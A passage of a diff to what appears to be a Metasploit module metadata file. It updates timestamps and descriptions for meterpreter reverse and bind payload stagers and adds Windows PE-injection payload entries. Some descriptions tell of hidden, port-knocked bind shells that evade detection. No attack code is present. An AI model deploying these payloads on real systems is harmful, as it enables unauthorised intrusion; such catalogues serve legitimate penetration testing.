+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -157185,7 +159173,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_https",
@@ -157208,7 +159196,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
    "references": [

    ],
@@ -157218,7 +159206,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp",
@@ -157243,7 +159231,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Reverse Python connect back stager using SSL",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
    "references": [

    ],
@@ -157253,7 +159241,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp_ssl",
@@ -157277,7 +159265,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Connect back to the attacker with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
    "references": [

    ],
@@ -157287,7 +159275,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_tcp_uuid",
@@ -157320,7 +159308,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-09-04 15:43:55 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_bind_tcp",
@@ -157353,7 +159341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-09-04 15:43:55 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_http",
@@ -157386,7 +159374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-09-04 15:43:55 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_https",
@@ -157419,7 +159407,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-09-04 15:43:55 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_tcp",
@@ -158261,7 +160249,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_ipv6_tcp",
@@ -158298,7 +160286,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_ipv6_tcp_uuid",
@@ -158333,7 +160321,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_named_pipe",
@@ -158404,7 +160392,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_tcp",
@@ -158442,7 +160430,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_tcp_rc4",
@@ -158478,7 +160466,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_tcp_uuid",
@@ -158585,7 +160573,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-08 06:24:02 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_http",
@@ -158762,7 +160750,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_tcp",
@@ -158835,7 +160823,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_tcp_dns",
@@ -158873,7 +160861,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_tcp_rc4",
@@ -158911,7 +160899,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_tcp_rc4_dns",
@@ -158947,7 +160935,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_tcp_uuid",
@@ -158983,7 +160971,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-11-21 13:53:33 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/reverse_winhttp",
@@ -159302,7 +161290,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_ipv6_tcp",
@@ -159339,7 +161327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid",
@@ -159376,7 +161364,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_named_pipe",
@@ -159450,7 +161438,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_tcp",
@@ -159489,7 +161477,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_tcp_rc4",
@@ -159526,7 +161514,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_tcp_uuid",
@@ -159638,7 +161626,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-08 06:24:02 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_http",
@@ -159712,7 +161700,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-12-08 06:24:02 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_https",
@@ -159824,7 +161812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_named_pipe",
@@ -159935,7 +161923,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_tcp",
@@ -160010,7 +161998,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_tcp_dns",
@@ -160049,7 +162037,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_tcp_rc4",
@@ -160088,7 +162076,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_tcp_rc4_dns",
@@ -160125,7 +162113,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_tcp_uuid",
@@ -160163,7 +162151,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-11-21 13:53:33 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_winhttp",
@@ -160201,7 +162189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-11-21 13:53:33 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/reverse_winhttps",
@@ -160237,7 +162225,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -160272,7 +162260,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -160307,7 +162295,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -160342,7 +162330,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -160377,7 +162365,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -160412,7 +162400,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-24 12:02:45 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -160588,7 +162576,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_ipv6_tcp",
@@ -160625,7 +162613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_ipv6_tcp_uuid",
@@ -160660,7 +162648,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_named_pipe",
@@ -160731,7 +162719,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_tcp",
@@ -160769,7 +162757,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_tcp_rc4",
@@ -160805,7 +162793,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_tcp_uuid",
@@ -160981,7 +162969,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/reverse_tcp",
@@ -161054,7 +163042,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/reverse_tcp_dns",
@@ -161092,7 +163080,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/reverse_tcp_rc4",
@@ -161130,7 +163118,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns",
@@ -161166,7 +163154,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/reverse_tcp_uuid",
@@ -161276,7 +163264,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp",
@@ -161313,7 +163301,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid",
@@ -161348,7 +163336,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-27 19:24:51 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_named_pipe",
@@ -161419,7 +163407,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_tcp",
@@ -161457,7 +163445,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_tcp_rc4",
@@ -161493,7 +163481,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_tcp_uuid",
@@ -161669,7 +163657,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/reverse_tcp",
@@ -161742,7 +163730,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/reverse_tcp_dns",
@@ -161780,7 +163768,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4",
@@ -161818,7 +163806,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns",
@@ -161854,7 +163842,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-15 15:10:26 +0000",
+    "mod_time": "2020-07-08 15:33:39 +0000",
    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid",
@@ -161865,6 +163853,722 @@
    },
    "needs_cleanup": false
  },
+  "payload_windows/peinject/bind_hidden_ipknock_tcp": {
+    "name": "Windows Inject PE Files, Hidden Bind Ipknock TCP Stager",
+    "fullname": "payload/windows/peinject/bind_hidden_ipknock_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_hidden_ipknock_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_hidden_tcp": {
+    "name": "Windows Inject PE Files, Hidden Bind TCP Stager",
+    "fullname": "payload/windows/peinject/bind_hidden_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2017-07-24 06:26:21 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_hidden_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_ipv6_tcp": {
+    "name": "Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)",
+    "fullname": "payload/windows/peinject/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-07-08 15:33:39 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/peinject/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "payload_windows/peinject/bind_ipv6_tcp_uuid": {
+    "name": "Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/peinject/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "ege <egebalci@pm.me>",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
